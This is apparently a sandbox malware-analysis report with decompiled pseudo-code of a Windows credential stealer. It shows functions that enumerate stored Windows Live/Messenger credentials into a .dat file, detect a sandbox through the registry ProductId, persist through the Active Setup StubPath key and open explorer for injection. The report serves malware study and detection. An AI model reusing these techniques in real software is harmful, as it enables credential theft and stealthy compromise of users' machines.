						_t90 = 0;
						do {
							_push( *_t70);
							_push("Messenger|");
							E00401CAC( &_v24,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x30)));
							_push(_v24);
							_push(0x409edc);
							E00401E10();
							_push( *_t70);
							E00409C1C( *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x1c)), _t70,  &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x18)),  *((intOrPtr*)(_v8 + _t90 * 4)), _t90);
							_push(_v32);
							_push(0x409edc);
							E00401E10();
							E00401CAC(_t70, E00401F48(_v28));
							_t90 = _t90 + 1;
							_t21 =  &_v20;
							 *_t21 = _v20 - 1;
							_t97 =  *_t21;
						} while ( *_t21 != 0);
					}
					FreeLibrary(_v16);
					_push(E00401D50( *_t70));
					E00406008( &_v36);
					E00401D58( &_v36, "xxxyyyzzz.dat");
					_pop(_t74);
					E00405D70(_v36, _t70, _t74,  *_t70, _t89, _t97);
				}
				_pop(_t76);
				 *[fs:eax] = _t76;
				_push(E00409E78);
				E00401AE4( &_v36, 4);
				_t78 =  *0x409bec; // 0x409bf0
				return E00402FC8( &_v8, _t78);
			}



















                                    0x00409d28
                                    0x00409d38
                                    0x00409d45
                                    0x00409d4a
                                    0x00409d59
                                    0x00409d6a
                                    0x00409d7d
                                    0x00409d91
                                    0x00409d9b
                                    0x00409da4
                                    0x00409da7
                                    0x00409daa
                                    0x00409dad
                                    0x00409daf
                                    0x00409daf
                                    0x00409db1
                                    0x00409dc2
                                    0x00409dc7
                                    0x00409dca
                                    0x00409dd6
                                    0x00409ddb
                                    0x00409de6
                                    0x00409deb
                                    0x00409dee
                                    0x00409dfb
                                    0x00409e0c
                                    0x00409e11
                                    0x00409e12
                                    0x00409e12
                                    0x00409e12
                                    0x00409e12
                                    0x00409daf
                                    0x00409e1b
                                    0x00409e27
                                    0x00409e2b
                                    0x00409e38
                                    0x00409e42
                                    0x00409e43
                                    0x00409e43
                                    0x00409e4a
                                    0x00409e4d
                                    0x00409e50
                                    0x00409e5d
                                    0x00409e65
                                    0x00409e70

                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000000,00409E71,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409D54
                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00409D65
                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00409D78
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryProc$FreeLoad
                                    • String ID: CredEnumerateA$CredFree$Messenger|$WindowsLive:name=*$advapi32.dll$xxxyyyzzz.dat
                                    • API String ID: 2256533930-2325380974
                                    • Opcode ID: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction ID: 58c175fa7aa483102e543733577c5d45540cb7646ec2fd880dc3ea0f10caa25c
                                    • Opcode Fuzzy Hash: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction Fuzzy Hash: 28311D75A00209AFDB01EFA5C842A9EB7B9EB48704B60447BF501B72D2D778ED058B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040806C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E0040806C(void* __eax, void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				CHAR* _t11;
				struct HINSTANCE__* _t12;
				CHAR* _t18;
				struct HINSTANCE__* _t19;
				CHAR* _t24;
				struct HINSTANCE__* _t25;
				CHAR* _t30;
				struct HINSTANCE__* _t31;
				intOrPtr _t44;
				intOrPtr _t51;

				_push(0);
				_push(0);
				_t48 = __eax;
				_push(_t51);
				_push(0x408182);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				if( *0x40d094 != 0) {
					if( *0x40d098 == 0) {
						E00401D9C( &_v12, 0x4081ac, __eax);
						_t11 = E00401F48(_v12);
						_t12 =  *0x40e9b8; // 0x0
						GetProcAddress(_t12, _t11);
					} else {
						_t18 = E00401F48(__eax);
						_t19 =  *0x40e9b8; // 0x0
						GetProcAddress(_t19, _t18);
					}
					L11:
					_pop(_t44);
					 *[fs:eax] = _t44;
					_push(E00408189);
					return E00401AE4( &_v12, 2);
				}
				 *0x40e9b8 = LoadLibraryA("rasapi32.dll");
				if( *0x40e9b8 == 0) {
					 *0x40e9b8 = LoadLibraryA("rnaph.dll");
					L5:
					if( *0x40e9b8 != 0) {
						_t24 = E00401F48(_t48);
						_t25 =  *0x40e9b8; // 0x0
						if(GetProcAddress(_t25, _t24) != 0) {
							 *0x40d094 = 1;
							 *0x40d098 = 1;
						}
					}
					goto L11;
				}
				E00401D9C( &_v8, 0x4081ac, _t48);
				_t30 = E00401F48(_v8);
				_t31 =  *0x40e9b8; // 0x0
				if(GetProcAddress(_t31, _t30) == 0) {
					goto L5;
				} else {
					 *0x40d094 = 1;
					goto L11;
				}
			}















                                    0x0040806f
                                    0x00408071
                                    0x00408075
                                    0x00408079
                                    0x0040807a
                                    0x0040807f
                                    0x00408082
                                    0x0040808e
                                    0x00408129
                                    0x0040814c
                                    0x00408154
                                    0x0040815a
                                    0x00408160
                                    0x0040812b
                                    0x0040812d
                                    0x00408133
                                    0x00408139
                                    0x0040813e
                                    0x00408167
                                    0x00408169
                                    0x0040816c
                                    0x0040816f
                                    0x00408181
                                    0x00408181
                                    0x0040809e
                                    0x004080aa
                                    0x004080eb
                                    0x004080f0
                                    0x004080f7
                                    0x004080fb
                                    0x00408101
                                    0x00408110
                                    0x00408112
                                    0x00408119
                                    0x00408119
                                    0x00408110
                                    0x00000000
                                    0x004080f7
                                    0x004080b6
                                    0x004080be
                                    0x004080c4
                                    0x004080d3
                                    0x00000000
                                    0x004080d5
                                    0x004080d5
                                    0x00000000
                                    0x004080d5

                                    APIs
                                    • LoadLibraryA.KERNEL32(rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 00408099
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004080CA
                                    • LoadLibraryA.KERNEL32(rnaph.dll,rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 004080E6
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408107
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408139
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408160
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: rasapi32.dll$rnaph.dll
                                    • API String ID: 2238633743-3306964077
                                    • Opcode ID: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction ID: b6a237a201236b193b27059562e9ff659002eca3acc9512b3faa464904049123
                                    • Opcode Fuzzy Hash: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction Fuzzy Hash: 88218070604240AFE765EBB59F42B5A369C9B08308F14487EF184BB3D2CB7C9D96835D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004063FC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E004063FC(long __eax, intOrPtr* __edx) {
				void* _v8;
				void* _t8;
				_Unknown_base(*)()* _t13;
				intOrPtr* _t29;
				intOrPtr _t37;
				long _t43;
				intOrPtr _t47;
				intOrPtr _t49;

				_t47 = _t49;
				_t29 = __edx;
				_t43 = __eax;
				E00401AC0(__edx);
				_t8 = OpenProcess(0x410, 0, _t43);
				_v8 = _t8;
				if(_v8 == 0) {
					return _t8;
				} else {
					_push(_t47);
					_push(0x4064a9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t49;
					E00402074(_t29, 0x104);
					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
					_push(0x104);
					_push(E00401F48( *_t29));
					_push(0);
					_push(_v8);
					if( *_t13() <= 0) {
						E00401AC0(_t29);
					} else {
						E00402074(_t29, E004063EC(E00401F48( *_t29)));
					}
					_pop(_t37);
					 *[fs:eax] = _t37;
					_push(0x4064b0);
					return CloseHandle(_v8);
				}
			}











                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction ID: bd0c567add07f6e237ff98e8278f53c40e5ea01a94fcde37a46f9e1c644737da
                                    • Opcode Fuzzy Hash: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction Fuzzy Hash: 2911AC71700200BFE710BABA8D42B5A76DCDB85B58F22087BF606F72C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004063FA, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E004063FA(long __eax, intOrPtr* __edx) {
				void* _v8;
				void* _t8;
				_Unknown_base(*)()* _t13;
				intOrPtr* _t29;
				intOrPtr _t37;
				long _t43;
				intOrPtr _t47;
				intOrPtr _t49;

				_t47 = _t49;
				_t29 = __edx;
				_t43 = __eax;
				E00401AC0(__edx);
				_t8 = OpenProcess(0x410, 0, _t43);
				_v8 = _t8;
				if(_v8 == 0) {
					return _t8;
				} else {
					_push(_t47);
					_push(0x4064a9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t49;
					E00402074(_t29, 0x104);
					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
					_push(0x104);
					_push(E00401F48( *_t29));
					_push(0);
					_push(_v8);
					if( *_t13() <= 0) {
						E00401AC0(_t29);
					} else {
						E00402074(_t29, E004063EC(E00401F48( *_t29)));
					}
					_pop(_t37);
					 *[fs:eax] = _t37;
					_push(0x4064b0);
					return CloseHandle(_v8);
				}
			}











                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction ID: 60ef08ce5071abddf90c8e8173ba23e59c29dd9c076ad28b438bd73e609ca94b
                                    • Opcode Fuzzy Hash: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction Fuzzy Hash: 4501AD70700200BFE710AABA8C42F6B76DCDB45B48F52047ABA01F73C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404460, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00404460(void* __eax, void* __ecx) {
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t6;
				void* _t8;
				struct HRSRC__* _t15;
				void* _t16;
				long _t22;
				void* _t24;

				_t24 = __eax;
				_t2 =  *0x40e670; // 0x400000
				_t15 = FindResourceA(_t2, "XX-XX-XX-XX", 0xa);
				_t4 =  *0x40e670; // 0x400000
				_t22 = SizeofResource(_t4, _t15);
				_t6 =  *0x40e670; // 0x400000
				_t16 = LoadResource(_t6, _t15);
				_t8 = LockResource(_t16);
				_t23 = _t8;
				if(_t8 != 0) {
					E00402074(_t24, _t22 - 1);
					E00403730(E00401F9C(_t24), _t23);
					return FreeResource(_t16);
				}
				return _t8;
			}











                                    0x00404464
                                    0x0040446d
                                    0x00404478
                                    0x0040447b
                                    0x00404486
                                    0x00404489
                                    0x00404494
                                    0x00404497
                                    0x0040449c
                                    0x004044a0
                                    0x004044a7
                                    0x004044b7
                                    0x00000000
                                    0x004044bd
                                    0x004044c6

                                    APIs
                                    • FindResourceA.KERNEL32(00400000,XX-XX-XX-XX,0000000A), ref: 00404473
                                    • SizeofResource.KERNEL32(00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000,00000000,00000000), ref: 00404481
                                    • LoadResource.KERNEL32(00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000), ref: 0040448F
                                    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 00404497
                                    • FreeResource.KERNEL32(00000000,00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 004044BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindFreeLoadLockSizeof
                                    • String ID: XX-XX-XX-XX
                                    • API String ID: 4159136517-2094075872
                                    • Opcode ID: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction ID: e8a3a0dff3016fb6e66adb29364c5155cbf347710d255ba4738bd85805777bce
                                    • Opcode Fuzzy Hash: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction Fuzzy Hash: 30F05E91B006143BC2507ABB6C81E3B668CAB8575A3840D3AB605FB392D97EDD0143BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405334, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405334() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "55274-640-2673064-23950") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}







                                    0x0040533b
                                    0x00405353
                                    0x00405355
                                    0x00405375
                                    0x00405383
                                    0x00405385
                                    0x00405385
                                    0x00405383
                                    0x0040538b
                                    0x00405399

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040534C
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000), ref: 00405375
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040538B
                                    Strings
                                    • 55274-640-2673064-23950, xrefs: 0040537E
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405342
                                    • ProductId, xrefs: 0040536B
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 55274-640-2673064-23950$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-2078682219
                                    • Opcode ID: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction ID: 1e6d94a0f8f115d3a99371f43301c37098f18dfbe8dcc5c06d224e81d40a16f2
                                    • Opcode Fuzzy Hash: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction Fuzzy Hash: 66F012706447007AD610DA94CC82F9FB79CDB51754F20483AFD44FA1C1D2FDE9489B6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004068B4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E004068B4(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t43;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t62;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t43 = __ecx;
				_push(_t62);
				_push(0x40698a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62;
				E00401CAC( &_v16, __edx);
				E00401D9C( &_v12, _v16, "Software\\Microsoft\\Active Setup\\Installed Components\\");
				RegCreateKeyExA(0x80000002, E00401F48(_v12), 0, 0, 0, 2, 0,  &_v8, 0);
				E00401CAC( &_v20, _t43);
				_t26 = E00401D50(_v20);
				_t27 =  *0x40d090; // 0x0
				_t28 = E00401D50(_t27);
				E00401CAC( &_v24, _t43);
				_t53 =  *0x40d090; // 0x0
				E00401D58( &_v24, _t53);
				RegSetValueExA(_v8, "StubPath", 0, 1, E00401F48(_v24), _t26 + _t28);
				RegCloseKey(_v8);
				_pop(_t54);
				 *[fs:eax] = _t54;
				_push(E00406991);
				return E00401AE4( &_v24, 4);
			}















                                    0x004068b7
                                    0x004068b9
                                    0x004068bb
                                    0x004068bd
                                    0x004068bf
                                    0x004068c3
                                    0x004068c9
                                    0x004068ca
                                    0x004068cf
                                    0x004068d2
                                    0x004068ea
                                    0x004068fa
                                    0x0040690d
                                    0x00406917
                                    0x0040691f
                                    0x00406926
                                    0x0040692b
                                    0x00406938
                                    0x00406940
                                    0x00406946
                                    0x00406961
                                    0x0040696a
                                    0x00406971
                                    0x00406974
                                    0x00406977
                                    0x00406989

                                    APIs
                                    • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,0040698A,?,?,?,00000000,00000000), ref: 0040690D
                                    • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000), ref: 00406961
                                    • RegCloseKey.ADVAPI32(?,?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040696A
                                    Strings
                                    • StubPath, xrefs: 00406958
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004068F5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\$StubPath
                                    • API String ID: 1818849710-1145743385
                                    • Opcode ID: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction ID: fbe9536e074d3ad2c9ece0b486aa800bdd175237d852bd473bb7d96c7317ef30
                                    • Opcode Fuzzy Hash: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction Fuzzy Hash: 1B216374A502087BEB00EBA1CC42FAE73ACEB44708F614077F905F76E1D678AE01866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407CAC, Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E00407CAC(void* __eax, void* __ebx, void* __ecx) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				union _SID_NAME_USE _v24;
				void* _v28;
				void _v284;
				char _v540;
				void* _t50;
				intOrPtr _t56;
				void* _t60;

				_v8 = 0;
				_t50 = __eax;
				_push(_t60);
				_push(0x407d81);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffde8;
				E00401AC0(__eax);
				E00402074( &_v8, 0x100);
				_v12 = 0xff;
				if(GetUserNameA(E00401F9C( &_v8),  &_v12) != 0) {
					_v16 = 0xff;
					_v20 = 0xff;
					if(LookupAccountNameA(0, E00401F9C( &_v8),  &_v284,  &_v16,  &_v540,  &_v20,  &_v24) != 0 && IsValidSid( &_v284) != 0) {
						_push( &_v28);
						_push( &_v284);
						L00407B54();
						E00401CAC(_t50, _v28);
						GlobalFree(_v28);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(E00407D88);
				return E00401AC0( &_v8);
			}














                                    0x00407cb8
                                    0x00407cbb
                                    0x00407cbf
                                    0x00407cc0
                                    0x00407cc5
                                    0x00407cc8
                                    0x00407ccd
                                    0x00407cda
                                    0x00407cdf
                                    0x00407cfa
                                    0x00407cfc
                                    0x00407d03
                                    0x00407d36
                                    0x00407d4b
                                    0x00407d52
                                    0x00407d53
                                    0x00407d5d
                                    0x00407d66
                                    0x00407d66
                                    0x00407d36
                                    0x00407d6d
                                    0x00407d70
                                    0x00407d73
                                    0x00407d80

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                    • LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                    • IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                    • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                    • GlobalFree.KERNEL32(?), ref: 00407D66
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Name$AccountConvertFreeGlobalLookupStringUserValid
                                    • String ID:
                                    • API String ID: 1214381313-0
                                    • Opcode ID: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction ID: cb8f30fe2752fb84fa2a751701b307f0b12e4b3c054cd12de1de141c6e833035
                                    • Opcode Fuzzy Hash: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction Fuzzy Hash: 0A214F71D0420DABDB11EFA1CD829EFB7BCAF08304F504577B500F2191EB38AB458A69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AFB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 63%
                                    			E0040AFB0(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t49;
				void* _t55;

				_v20 = 0;
				_v16 = 0;
				_push(_t55);
				_push(0x40b062);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffff0;
				E004013A4(0,  &_v16);
				_t52 = E00401F48(_v16);
				GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
				_t37 = OpenProcess(0x1f0fff, 0, _v8);
				E00401CAC( &_v20, _t17);
				_v12 = E0040AEBC(_t22, E00401D50(_v20), _t52);
				E0040AF08(_t37, E0040AEBC(_t37, 4,  &_v12), E0040AE94);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E0040B069);
				return E00401AE4( &_v20, 2);
			}









                                    0x0040afba
                                    0x0040afbd
                                    0x0040afc2
                                    0x0040afc3
                                    0x0040afc8
                                    0x0040afcb
                                    0x0040afd3
                                    0x0040afe0
                                    0x0040aff3
                                    0x0040b008
                                    0x0040b00f
                                    0x0040b027
                                    0x0040b042
                                    0x0040b049
                                    0x0040b04c
                                    0x0040b04f
                                    0x0040b061
